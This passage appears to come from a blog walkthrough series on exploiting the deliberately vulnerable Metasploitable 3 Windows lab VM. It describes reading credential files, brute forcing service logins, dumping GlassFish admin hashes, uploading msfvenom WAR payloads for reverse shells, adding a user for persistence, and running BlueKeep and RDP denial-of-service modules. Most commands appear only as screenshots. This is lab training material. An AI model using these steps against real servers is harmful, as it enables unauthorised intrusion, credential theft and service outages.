src="https://drive.google.com/uc?id=1s0_DLpijGg08JjXx8-XJpghcdax2FDuL" border="0"></a><p>You will be prompted for the credentials:<p><a href="https://drive.google.com/uc?id=1mrogOfo9jwYbfDyj9zNh9RMFzGVNqC3-" target="_blank"><img width="806" height="219" title="Accessing the Tomcat Manager App" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the Tomcat Manager App" src="https://drive.google.com/uc?id=1Uv3Vx2b1YkI3GfO8HTqyc86evxbizBtV" border="0"></a><p>Now just press “Cancel and you will see a <b><em>401</em></b> page with some very interesting information:<p><a href="https://drive.google.com/uc?id=16jKEZRIwaRu5vY_Q45m3cG_8PnAgE5e5" target="_blank"><img width="806" height="410" title="Accessing the Tomcat Manager App" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the Tomcat Manager App" src="https://drive.google.com/uc?id=1gTU51UXJxt6_C_mY4C8NKJiBFNqZP4Ut" border="0"></a><p>So, the Tomcat server is telling you exactly where to find the valid credentials to login in the Manager App; a file named <b><em>tomcat-users.xml</em></b>.<p>So, all you have to do is read that file to have proper access to the tomcat server. <p>Using a shell from another exploit, browse to:<p><strong><em>C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf</em></strong><p><a href="https://drive.google.com/uc?id=1up4eBKqlxwGGhKoPRjo1pee8bkUy_rkL" target="_blank"><img width="806" height="261" title="Getting Tomcat credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting Tomcat credentials" src="https://drive.google.com/uc?id=1pU0hlzZjWr9zPJYx1lJm4B6I_fVngwuG" border="0"></a><p><strong></strong><p><p>Now examine the contents of the file <b><em>tomcat-users.xml</em>.</b><p><a href="https://drive.google.com/uc?id=1Yvm_cXZIUg2Piyx_R04oSjUEHIzoELTs" target="_blank"><img width="796" height="651" title="Getting Tomcat credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting Tomcat credentials" src="https://drive.google.com/uc?id=1GleAXTeTcUqVtbNFTAMvmCRQotgLV93N" border="0"></a><p><b></b><b></b><p>This reveals the username and password to be “<b><em>sploit/sploit</em></b>”<h3>Enumerating Apache Tomcat using Metasploit</h3><p>The Metasploit module will enumerate the available usernames<p><a href="https://drive.google.com/uc?id=1vHVfgAHYVdZFtQoNZFEgY31qxTxsBnOS" target="_blank"><img width="806" height="368" title="Enumerating Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Tomcat with Metasploit" src="https://drive.google.com/uc?id=1L87shqcSleRjgQSGa36JUdcBkdlW2OOc" border="0"></a><p>Obtaining a remote shell on this web server will require uploading and executing a file, but for Tomcat the executable must be a JSP (Java Server Pages) application.</p><h3>Exploiting Apache Tomcat using Metasploit</h3><p>This is solved by the <b><em>tomcat_mgr_upload</em> </b>module:<p><a href="https://drive.google.com/uc?id=1GUr1HXs3LFJHszSd7kBfKaWri80e_lh1" target="_blank"><img width="806" height="339" title="Exploiting Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Tomcat with Metasploit" src="https://drive.google.com/uc?id=1kOGnwVtX_uArtF5FbNjk6UcA6WGKBY8m" border="0"></a><p>This is a low privilege shell because it used the default Java target and payload.<p>But using this module you can also get a system shell:<p><a href="https://drive.google.com/uc?id=1y4PFWnWUGLZqq0_vQtgJCM1LoPLJmH0O" target="_blank"><img width="806" height="366" title="Exploiting Tomcat with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Tomcat with Metasploit" src="https://drive.google.com/uc?id=1Pg8smpOaXNEQV7D7FzhYob0q2G0SKbkG" border="0"></a><p><em><b>NOTE</b>:</em> With this module you can get at least two meterpreter system shells and two system command shells, pending on the payload you use:<ul><li>windows/meterpreter/reverse_tcp</li><li>windows/meterpreter_reverse_tcp</li><li>windows/shell/reverse_tcp</li><li>windows/shell_reverse_tcp</li></ul><h3>Exploiting Apache Tomcat manually</h3><p>If, for some reason, the Metasploit automated payload deployment fails you can still exploit this server manually.<p>The management web interface gives us a place to upload <b><em>WAR</em></b> files, and a way to execute them manually. <p>The <b><em>.war</em></b> are Web ARchive files that contain all the files needed for a Java based web application. These are the files used by the Metasploit modules.<p>Using <b>msfvenom</b>, you can create shellcode and then specify what type of file to send it to. It just so happens, that one of the filetypes that msfvenom supports is .war.<p>Use msfvenom to craft a WAR file with the payload, then manually upload and execute it.<ul><li>Kali IP: 172.16.1.6</li><li>Kali port: 5555</li></ul><p><a href="https://drive.google.com/uc?id=1ek6tPUILyT8hvTKy3QHSIzorz6ZDTJR4" target="_blank"><img width="806" height="138" title="Creating a payload with msfvenom" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a payload with msfvenom" src="https://drive.google.com/uc?id=1-bOZ2_hdsBgZxIoEAxJaQIhJMMOTwmEH" border="0"></a></p><p>Access the manager at <b><em>[Target IP]:8282/manager/html</em>. </b>You will be asked for credentials but that is not a problem; just enter sploit/sploit.<p>Select the previous file and deploy it.<p><a href="https://drive.google.com/uc?id=1nNgfTwMtXyZbcABwQJvV7qCdadDAMS7W" target="_blank"><img width="806" height="550" title="Uploading the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload" src="https://drive.google.com/uc?id=1EBJYZEN_vs_xXh848ZmhVsfvliQ-b2zG" border="0"></a><p>Note that this does NOT execute the payload yet!!! You need to unpack the <b><em>.war</em></b> to get the filename of the corresponding <b><em>.jsp</em></b> file:<p><a href="https://drive.google.com/uc?id=1l28wrt1d_EDF61aJ20qWtd3-4ZWZC-qk" target="_blank"><img width="806" height="188" title="Unpacking the .war file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Unpacking the .war file" src="https://drive.google.com/uc?id=1nkLcFL6QEOwO1P8KTzicHijg4zDw-qwJ" border="0"></a><p>Use Netcat to receive the incoming shell once the WAR file is executed.<p><a href="https://drive.google.com/uc?id=1AfvLKboCtG1Q0WnvnGsr8QRVjqjC758V" target="_blank"><img width="420" height="146" title="Starting a Netcat listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Netcat listener" src="https://drive.google.com/uc?id=16udETUeXCBxVRSFrOPH5MtJjr1Hi6oBt" border="0"></a><p>To execute the payload and run the actual .war file, you will need to visit the page:<p><strong><em>http://[Target IP]:8180/runme/[Name of file.jsp]</em></strong> <p>Run the applet/exploit on your browser:<p><a href="https://drive.google.com/uc?id=1Wj7FUeG6R13-UMV9kWEuOMtzoFjxg7Ci" target="_blank"><img width="628" height="123" title="Running the payload on the browser" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the payload on the browser" src="https://drive.google.com/uc?id=1tyZj10nljbJZC--5d53zIJSAuORL_wKN" border="0"></a><p>And you will have a shell:<p><a href="https://drive.google.com/uc?id=1GOAdyfeGvjPPMnRseiLsKDt9jlI1-5si" target="_blank"><img width="806" height="222" title="Netcat shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Netcat shell" src="https://drive.google.com/uc?id=1HMQ2_yz2_2Trru7NTFeJbOXfb16BiQiY" border="0"></a><p><b>NOTE</b>: You can also setup a listener using Metasploit’s multi handler module.<p><a href="https://drive.google.com/uc?id=1JH-iLx4mENvy1228u3JfZ8cOKGm_2FU7" target="_blank"><img width="806" height="260" title="Metasploit command shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Metasploit command shell" src="https://drive.google.com/uc?id=1eJEYq83skm1VWTDq7CXTA4CaBgepS0s-" border="0"></a><p>The advantage of using Metasploit if the possibility of changing the session from command shell to meterpreter.<p>But sometimes this is just not possible.<p><a href="https://drive.google.com/uc?id=1UcFPX_z4bEaT2QaWiHjZShbUdATM1T8p" target="_blank"><img width="806" height="119" title="Failed shell upgrade" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed shell upgrade" src="https://drive.google.com/uc?id=1bwvyqvGAKJdUHNEWwJ0TnOwm7VM1b62c" border="0"></a><p>But you can try to open a meterpreter session directly:<p><a href="https://drive.google.com/uc?id=1QdgAePIWlcqrmMtrhh2gz7NIIBlSZDDo" target="_blank"><img width="806" height="108" title="Creating a new payload with msfvenom" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a new payload with msfvenom" src="https://drive.google.com/uc?id=1e8c70B0btVt0aCMJPeYY1GBFntPEFPEe" border="0"></a><p><a href="https://drive.google.com/uc?id=1fj-fvYy33CggtYyfX3sbWQD4jRTtxziG" target="_blank"><img width="700" height="154" title="Unpacking the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Unpacking the payload" src="https://drive.google.com/uc?id=10wDW4n-6tBah4Zm4GhVUR-hCBd_IVCfJ" border="0"></a><p><a href="https://drive.google.com/uc?id=1MTW6gAHxiqtWEqBowqINjcoJ8oL0OJZ_" target="_blank"><img width="607" height="108" title="Uploading the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload" src="https://drive.google.com/uc?id=1Hy8ONekHAKC2yPIqQw3KNvxcUJOIjcG-" border="0"></a><p>Start the Metasploit handler using the same payload as the one you use in the MSFVenom:<p><a href="https://drive.google.com/uc?id=1K0w9EIer5RSYMgnVvMB7UGvgTemDe1iA" target="_blank"><img width="806" height="157" title="Starting a Metasploit listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Metasploit listener" src="https://drive.google.com/uc?id=16EVo9oMxCUdmJvtKG-Db_UXp1wVSIh5L" border="0"></a><p><a href="https://drive.google.com/uc?id=1jK2Zk-vYtng5U_gSEkywxktX3g4sKtTh" target="_blank"><img width="643" height="102" title="Running the Java payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the Java payload" src="https://drive.google.com/uc?id=19omRRL-XPjpQIHrthFC9o2E-CDAOyROP" border="0"></a><p><a href="https://drive.google.com/uc?id=15JYalkpKGjL5giBrY334dRp4rbTKngP1" target="_blank"><img width="806" height="80" title="Meterpreter system shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter system shell" src="https://drive.google.com/uc?id=1MTVGdpRQ3W9d_eDkr3XXXeE1TMiEZYQ6" border="0"></a><p>And you will have a high privilege meterpreter shell.<h4>Cleaning</h4><p>Remove the .war files by going back to at <b><em>[Target IP]:8282/manager/html</em> </b>and clicking "<strong><em>Undeploy</em></strong>".<h2>Exploiting Port 8282 - Apache Axis2</h2><p>Apache Axis2 is a core engine for Web services. It is a complete re-design and re-write of the widely used Apache Axis SOAP stack. You access the service from the Tomcat manager page:<p><a href="https://drive.google.com/uc?id=1hBcqPE41O5Aty-F64HW0wSxMb4BpHYF6" target="_blank"><img width="806" height="305" title="Accessing Apache Axis2" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing Apache Axis2" src="https://drive.google.com/uc?id=1y_Icln94iXj_rr0bZZ3ixRTSbfWyafQ1" border="0"></a><p>That link will open the general service page. From here you can access the Administration page:<p><a href="https://drive.google.com/uc?id=1h1Ye80ThBERk-OVbuc3hpPuqMwKx9owL" target="_blank"><img width="806" height="345" title="Accessing Apache Axis2" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing Apache Axis2" src="https://drive.google.com/uc?id=1kNgm_NgLYMvBGmK4flA82rmUXORJnx3s" border="0"></a><p><a href="https://drive.google.com/uc?id=1f2sdRgXG7aAxMSW4QxF9CEX65MXzNW-u" target="_blank"><img width="804" height="297" title="Accessing Apache Axis2" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing Apache Axis2" src="https://drive.google.com/uc?id=1uI3SHQj4Bk2A6upHM4fSo94ljZZYkNLf" border="0"></a><h3>Brute forcing Axis2 using Metasploit</h3><p>Try to brute force the credentials:<p><a href="https://drive.google.com/uc?id=1vzWpND4XBVHOVXljWjCBNHUBK-OKOufd" target="_blank"><img width="806" height="337" title="Brute forcing Axis2 with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing Axis2 with Metasploit" src="https://drive.google.com/uc?id=1CLbCHUXRNsurUdPHrh_7nRhe9sg_t9S4" border="0"></a><p>Now you have a valid set of credentials to login and manage the Apache Axis2 service.<h3>Exploiting Axis2 using Metasploit<strong></strong></h3><p><strong>Another possible approach is to exploit the service using the previously found credentials and a Metasploit module.</strong><p><a href="https://drive.google.com/uc?id=1Tr-tvseSYjam0eqIX5X9hHi1wa2sBkb8" target="_blank"><img width="806" height="297" title="Exploiting Axis2 with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Axis2 with Metasploit" src="https://drive.google.com/uc?id=1T9RC-S5A0hQsovMbp6YBCjIddTxFSGT1" border="0"></a><p>Using the default module settings, you will get a low privilege meterpreter session.<p><b>NOTE</b>: If you have found valid credentials and they were added to the workspace database, the module will load them automatically. <h2>Exploiting Port 8282 - Apache Struts2</h2><p>Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller architecture.<p><a href="https://drive.google.com/uc?id=1ENdh6YlJnQX0Japz3kLBBEAIyndXbUNk" target="_blank"><img width="806" height="280" title="Accessing Apache Struts2" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing Apache Struts2" src="https://drive.google.com/uc?id=16zBKp66lIYCsg8v1k5rNuuOx3a-qH7YV" border="0"></a><h3>Exploiting Struts2 using Metasploit</h3><p>This service is exploitable using Metasploit:<p><a href="https://drive.google.com/uc?id=1UYnB8ZNLLh3bBicudntllVlsZFyXZEDn" target="_blank"><img width="806" height="265" title="Exploiting Struts2 with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Struts2 with Metasploit" src="https://drive.google.com/uc?id=1tHaCOEZB_djdWMEEmHR_v4l379KRg6hn" border="0"></a><p>As usual, using the default settings for target (Java) and payload, you will get a low privilege session.<p>Change it to Windows:<p><a href="https://drive.google.com/uc?id=1l6dt7c-nZiujqkfnvXRN8C1zqB4rIHdb" target="_blank"><img width="806" height="293" title="Exploiting Struts2 with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Struts2 with Metasploit" src="https://drive.google.com/uc?id=1c8meCv6f-544laRflvXTurw8FQXvNpmT" border="0"></a><p>Now you have a high privilege session.<h2>Exploiting Port 8484 – Jenkins</h2><p>Jenkins is an open source automation server written in Java. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery.<strong></strong><p><strong>As soon as you try to visualize the service, you will get information on where to find the administrator password. </strong></p><p><a href="https://drive.google.com/uc?id=1K8MU8OYXPeg62d9viO9ZkM70eEKGB-SF" target="_blank"><img width="753" height="347" title="Jenkins entry page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Jenkins entry page" src="https://drive.google.com/uc?id=1KQYSHea5GxfoXP5uwb_WkPBAuZ3JHBPm" border="0"></a><p><strong></strong><p><strong>Like you did before, using a shell you can get access to the </strong><strong>initialAdminPassword</strong><strong> file and read the password.</strong><p><a href="https://drive.google.com/uc?id=1s2Zu4wZsme3923iKo8t0hA4NK3AFWGrh" target="_blank"><img width="806" height="57" title="Jenkins password" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Jenkins password" src="https://drive.google.com/uc?id=1pQ-KvVXEw6ahl3NM4pAviE4pB_cZJgKg" border="0"></a><p><strong></strong><p><strong>Now, using this password you can admin the Jenkins service:</strong><p><a href="https://drive.google.com/uc?id=1KifeMI85luokX5fWLRm0b5t2_YR0PxQt" target="_blank"><img width="754" height="458" title="Accessing Jenkins" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing Jenkins" src="https://drive.google.com/uc?id=17mBxKVynitVHVcsxYZr1dE-fqCJv5pym" border="0"></a><p><strong></strong><h3>Enumerating Jenkins using Metasploit<strong></strong></h3><p>The initial version of Metasploitable 3 shipped with Jenkins v1.67 and that was very vulnerable to enumeration. The current version of the vulnerable VM ships with Jenkins 2.02 and that is completely different:<p><a href="https://drive.google.com/uc?id=1sMp9MZWllHNbf4qysgB28JzGvKhHU-82" target="_blank"><img width="806" height="223" title="Enumerating Jenkins with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating Jenkins with Metasploit" src="https://drive.google.com/uc?id=18tqMFE8VNLNhsUs5njyvKEry6WBrL8SS" border="0"></a><h3>Exploiting Jenkins using Metasploit</h3><p>Using the previous credentials, you can get a meterpreter shell:<p><a href="https://drive.google.com/uc?id=1R0u2fu99w7bB4PLuHBXbfNVcWXCTYIuk" target="_blank"><img width="806" height="437" title="Exploiting Jenkins with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Jenkins with Metasploit" src="https://drive.google.com/uc?id=16T2z2d3UUjTVtd3syhb7vmwOsj1_y0k7" border="0"></a><p>But it is a low privilege session…<p><br></p><p><p><a title="Metasploitable 3 W2k8 Walkthrough: Part X" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part-x.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-81685391032115259462020-11-05T14:14:00.000-08:002020-11-21T04:24:09.913-08:00Metasploitable 3 Windows Walkthrough: Part VIII<h2>Exploiting Port 5985 – Windows Remote Management</h2><p>Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate. <h3>Accessing Port 5985</h3><p>Load the proper Metasploit module and use the existing credentials:<p><a href="https://drive.google.com/uc?id=1FcXUbag8bVgjnnCWOXflbfsGKUglOmwm" target="_blank"><img width="806" height="230" title="Brute forcing WinRM with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing WinRM with Metasploit" src="https://drive.google.com/uc?id=1MgUv3sPP0Fo_JhHqcPniGn3SUNqLu_vk" border="0"></a><h3>Exploiting Port 5985</h3><p>Executing remote commands is easy with the appropriate module. <p>Create a new user, maybe to use as a persistence technique:<p><a href="https://drive.google.com/uc?id=1DY3CwdY1wiPsuBf4nziGlMGs0d4ptvIh" target="_blank"><img width="806" height="242" title="Exploiting WinRM with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting WinRM with Metasploit" src="https://drive.google.com/uc?id=1Qng6TyQYwJtbCGr_2Hrj7jgoL21M_kH4" border="0"></a><p><a name="more"></a><p>But a meterpreter shell is also easy to get:<p><a href="https://drive.google.com/uc?id=1v1KTHXWtJAai8AOI_cS8ku0k9Hk3hxjZ" target="_blank"><img width="806" height="492" title="Exploiting WinRM with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting WinRM with Metasploit" src="https://drive.google.com/uc?id=1M1yKv5HlYaLYq6sbazvjZluI2V5ef7rg" border="0"></a><h2><a name="_Toc52385194"></a></h2><a name="more"></a><h2>Exploiting Port 8020 – Desktop Manage Engine</h2><p>ManageEngine offers enterprise IT management software for your service management, operations management, Active Directory and security needs.<h3>Accessing Desktop Manage Engine</h3><p>When you browse this port, you will see the entry page of the service waiting for login credentials:<p><a href="https://drive.google.com/uc?id=1SiN-5mm5I8d-YSerkxua0fmiQ5OeVqbn" target="_blank"><img width="637" height="396" title="ManageEngine login page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="ManageEngine login page" src="https://drive.google.com/uc?id=13j96Vu8Egpa1m91LJnF6ynBmbUDQPFMP" border="0"></a><p>Try to brute force your access with Metasploit:<p><a href="https://drive.google.com/uc?id=1A_c6tQAYykVsvGMXXtncb9FkV4ZyQcBf" target="_blank"><img width="806" height="229" title="Brute forcing ManageEngine with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing ManageEngine with Metasploit" src="https://drive.google.com/uc?id=1ZsHtIYaMth7fILQAvffqFF9hlU856zE2" border="0"></a><p>Using these credentials, you can now enter the Desktop Central 9 Administration page:<p><a href="https://drive.google.com/uc?id=1IwdpFbPQXPApgeVBb3rguW-nyC5O4NGQ" target="_blank"><img width="703" height="404" title="Accessing ManageEngine" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing ManageEngine" src="https://drive.google.com/uc?id=1mFDUwXBwETo4gzC-fNCW4aV-x0ZqbRLz" border="0"></a><p>From here it should be easy to turn this new access level in a shell on the target machine. To turn regular functionality into a shell you should be looking out for functionality to upload files, install plugin’s, edit system files and anything else that allows you to execute code or commands on the target system.<p><a href="https://drive.google.com/uc?id=11NxJJONVwjvDZMN2lwGhEMgwLLPa5Tar" target="_blank"><img width="687" height="375" title="ManageEngine administration page" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="ManageEngine administration page" src="https://drive.google.com/uc?id=1cBQO70RR0FRuWYZuf9XRVhbSin57oY_K" border="0"></a><p><b>NOTE</b>: The administration page can be accessed over the HTTP port 8020 and the HTTPS port 8383<h3>Exploiting Desktop Manage Engine</h3><p>This service can also be exploited using a proper Metasploit module:<p><a href="https://drive.google.com/uc?id=1y1k_xzmC0JGi88FFq0Wp1WobRu3BFj2f" target="_blank"><img width="806" height="309" title="Exploiting ManageEngine with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting ManageEngine with Metasploit" src="https://drive.google.com/uc?id=1dfCb_MY5p_2iu_zLj-TcuoNzZB_d2oUV" border="0"></a></p><p><p><a title="Metasploitable 3 Windows Walkthrough: Part IX" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part_50.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com4tag:blogger.com,1999:blog-6396309617370994433.post-85143396261117106262020-11-05T10:46:00.000-08:002020-11-21T04:23:26.007-08:00Metasploitable 3 Windows Walkthrough: Part VII<h2>Exploiting Port 3389 – RDP</h2><p>By default, the Remote Desktop Protocol (RDP) is not enabled on any Windows operating system. Metasploitable 3 has several RDP vulnerabilities.<p>Just by typing <b><em>rdesktop [Target IP]</em></b> you can get access to the remote machine, as long as you have valid credentials.</p><p><a href="https://drive.google.com/uc?id=1tFCS4TCnYLjZzrIS3UJ0JjMseoCyFlFI" target="_blank"><img width="815" height="708" title="Accessing RDP" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing RDP" src="https://drive.google.com/uc?id=1FyLlgP74RtoUzVlh3-wx5txrSsJcxkj1" border="0"></a><h3><a name="_Toc52385183"></a></h3><a name="more"></a><p>There are two vulnerabilities to be exploited in this service</p><h3>DoS Exploit</h3><p>The MS-020 vulnerability can be exploited to cause a Denial of Service condition in the remote machine. Metasploit has a couple of modules to test and exploit this vulnerability.<p><a href="https://drive.google.com/uc?id=1YBbjahqM82DM1vQ7tkIWcwwkJ4acYtta" target="_blank"><img width="806" height="316" title="Exploiting RDP to cause a DoS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting RDP to cause a DoS" src="https://drive.google.com/uc?id=14Z48MT7iyycrZncBqcpUj0jeT4MfvC7F" border="0"></a><p><a href="https://drive.google.com/uc?id=1CZsZHCUm46QMVNLZRIpqZZLsj6XfRgzx" target="_blank"><img width="606" height="454" title="Exploiting RDP to cause a DoS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting RDP to cause a DoS" src="https://drive.google.com/uc?id=1iUSbqfkMWC2zJCJVbZqNTGuacGfXVr3U" border="0"></a><h3>Bluekeep Exploit</h3><p>This service is also vulnerable to the Bluekeep attack and you can use the proper Metasploit module to check the existence of this vulnerability in the target machine.<p><a href="https://drive.google.com/uc?id=1Inn-emGu6m7rMeloI5fQAT0YiufvANA4" target="_blank"><img width="806" height="133" title="Checking for BlueKeep vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking for BlueKeep vulnerability" src="https://drive.google.com/uc?id=1iVsp1De0jHzHCXyzD0JXJHLS6UvBNDAr" border="0"></a><p>However, even if the scanner module reports the target as being vulnerable the exploit module will systematically fail. It will finish without opening a session and crashing the target machine. The solution can be found in the exploit module’s information:<p><i>Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout. <b>HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam</b> *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2. This is a non-standard configuration for normal servers, and the target will crash if the aforementioned Registry key is not set!</i><p>After setting the registry key to the correct setting, the exploit module will work flawlessly:<p><a href="https://drive.google.com/uc?id=1k-hmrs8LWGyC3tbL1xjDJWSeKAUyz8Ej" target="_blank"><img width="806" height="356" title="Exploiting the BlueKeep vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the BlueKeep vulnerability" src="https://drive.google.com/uc?id=1yuQAB5QWthUYO4Swv-idJEnQl0ADP4oD" border="0"></a><h2>Exploiting Port 4848 – GlassFish</h2><p>GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform. Accessing this port, you will see the interface for the Administration console:<p><a href="https://drive.google.com/uc?id=1oydwgBzKz204GOdE_LnpUHMTFTYBjbKl" target="_blank"><img width="483" height="383" title="GlassFish Administration Console" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="GlassFish Administration Console" src="https://drive.google.com/uc?id=1M_VBpf54wHA7k-7UqigoaxmwMj38I-32" border="0"></a><h3>Getting GlassFish credentials</h3><p>Try to brute force your way in using Metasploit and the custom wordlists including the credentials from Wordpress:<p><a href="https://drive.google.com/uc?id=1r9k8NkKdwWVzRRy84w-2kST-AqnP1S6q" target="_blank"><img width="806" height="271" title="Brute forcing GlassFish with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing GlassFish with Metasploit" src="https://drive.google.com/uc?id=1Lhxbo8qxDPspxwZRdj5JoOZnkJDa9Juc" border="0"></a><p>Or try to get credentials in another way:<p><a href="https://drive.google.com/uc?id=1LBgxz4eU3rg_OM2ZzH6--xLp-yPiUk-e" target="_blank"><img width="806" height="203" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=1r7gNOafe70jGUGAH3S03fGgThNjfGS3Q" border="0"></a><p>By default, the module will download the win.ini file:<p>But you should try to get something far more important like the user’s credentials. And those are located at:<p><strong><em>glassfish/glassfish4/glassfish/domains/domain1/config/admin-keyfile</em></strong><p><a href="https://drive.google.com/uc?id=1bAOYJZu0zcGyuOKcBplQZEKGZkmmmUsD" target="_blank"><img width="806" height="90" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=1qr4ZrKqQLu5kXRO4mjYj25EmhbTtvYyz" border="0"></a><p><a href="https://drive.google.com/uc?id=19-sgJ5e8SminkMNO4lLA-ehvI47Rp6dr" target="_blank"><img width="806" height="66" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=1HVWUxisX09wK4nunhFExYX8HOiUO4lNn" border="0"></a><p>You have found the hash for the admin account.<p>Try to get another one:<p><a href="https://drive.google.com/uc?id=1CNxT8pkiv50xrhwCcUe9UJoZ5CXJst5n" target="_blank"><img width="806" height="88" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=1Ci1TZpx-2JTIhsl7aZceH3lp6IvVBnWA" border="0"></a><p><a href="https://drive.google.com/uc?id=1BGR8KVR0RkZ0XCxPGJHlj3o-8FuBLjXx" target="_blank"><img width="806" height="66" title="Dumping hashes with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Metasploit" src="https://drive.google.com/uc?id=18Bcmqfvqwpbh0pgo1GXL0RDu0FOilrZS" border="0"></a><p>But this one is not associated with any user. From here you can try to identify them, crack them, etc.<p>Or you can try to login using the last hash as password:<p><strong>User</strong>: <i>admin</i>, <strong>Password</strong>: <i>183511DE8C2E7E281BE95DC1A3B6AAC3A51F9262</i><p><a href="https://drive.google.com/uc?id=1HcVG-TPD2SQyyDgc7VQ_y-PKTS9C6qIu" target="_blank"><img width="806" height="496" title="Accessing GlassFish" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing GlassFish" src="https://drive.google.com/uc?id=1_YlZ9I7zPDsuD9D23PKrj_D8F_7BPJCl" border="0"></a><p>Using the previous credentials, try to exploit the Glassfish service</p><h3>Exploiting GlassFish using Metasploit</h3><p>Load the appropriate module and set the correct options:<p><a href="https://drive.google.com/uc?id=1gVYEWlmgYM-Efs0L57IzxYU8GWP7zYu3" target="_blank"><img width="806" height="417" title="Exploiting GlassFish with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting GlassFish with Metasploit" src="https://drive.google.com/uc?id=1QGoI2v1AtXGWhQQx4amUHVatt8oY0d7N" border="0"></a><p>Unfortunately, this module is sometimes a bit unstable so if it fails the first time just run it again.<h3>Exploiting GlassFish using manual injection</h3><p>Try to inject a malicious payload manually using the Administration Console. In the <b><em>Application</em>s</b> node, select the <b><em>Deploy</em></b> page<p><a href="https://drive.google.com/uc?id=1i_y11-e33Ou0-hazL1NIz7aBov68ouf4" target="_blank"><img width="806" height="278" title="Looking for the place to deploy the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Looking for the place to deploy the payload" src="https://drive.google.com/uc?id=1zdjxQib4v7IY8psMUCO6p-c3tHFHj0RA" border="0"></a><p>In the <strong><em>Deploy</em></strong> page you will see where to upload the file into the server.<p><a href="https://drive.google.com/uc?id=1bWnQQT4CBaI1vIe7b_BVjPGg_syJNKXq" target="_blank"><img width="806" height="277" title="Looking for the 